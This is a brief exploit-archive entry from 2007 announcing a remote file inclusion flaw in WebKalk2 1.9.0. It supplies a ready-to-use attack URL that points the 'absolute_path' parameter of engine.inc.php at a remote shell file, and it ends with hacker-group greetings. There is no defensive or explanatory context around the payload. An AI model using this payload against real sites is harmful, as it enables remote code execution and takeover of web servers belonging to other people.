id: 1744
date: 04/11/2007
title: WebKalk2 1.9.0 (absolute_path) Remote File Inclusion Vulnerability
author: GoLd_M
cves: 

==================================================================
WebKalk2 1.9.0 (absolute_path) Remote File Inclusion Vulnerability
==================================================================



# WebKalk2 1.9.0 Remote File Include Vulnerablity
# Discovered by: GolD_M = [Mahmood_ali]
# Exploit:[Path]/engine/engine.inc.php?absolute_path=Shell.txt?
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# ThanX  To: bd0rk ;)




#  0day.today [2023-03-21]  #